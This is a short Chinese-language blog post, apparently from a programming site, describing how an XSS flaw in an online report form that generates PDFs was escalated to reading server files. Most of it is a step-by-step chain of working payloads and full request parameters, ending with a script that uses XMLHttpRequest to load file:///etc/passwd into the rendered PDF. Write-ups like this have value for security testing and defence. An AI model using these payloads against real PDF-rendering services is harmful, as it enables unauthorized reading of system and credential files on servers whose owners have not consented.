利用 XSS 漏洞读取任意文件,获得新思路
最编程
2024-06-28 07:54:16
...
简述
网站是一个在线填写报表功能,填写好报表之后可以生成报表的pdf文件
思路讲解
1. 发现解析xss
首先随便输入一个payload, "><S>aaa 。发现输入的标签被解析了
2. 用iframe标签加载,但是没有内容
使用iframe标签,但是没有内容。Id=b9bc3d&utrnumber="><iframe src="http://localhost"></iframe>&date=20
3. 确定可以解析js
d=b9bc3d&utrnumber=<img src=x onerror=document.write('aaaa')>&date=20
4. 加载url地址发现file协议
Id=b9bc3d&utrnumber=<img src=x onerror=document.write('aaaa'%2bwindow.location)>&date=20
5. 使用XHR(XMLHttpRequest)读取任意文件
<script>
x=new XMLHttpRequest;
x.onload=function(){
document.write(this.responseText)
};
x.open("GET","file:///etc/passwd");
x.send();
</script>
Id=b9bc3d&utrnumber=<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///etc/passwd");x.send();</script>&date=20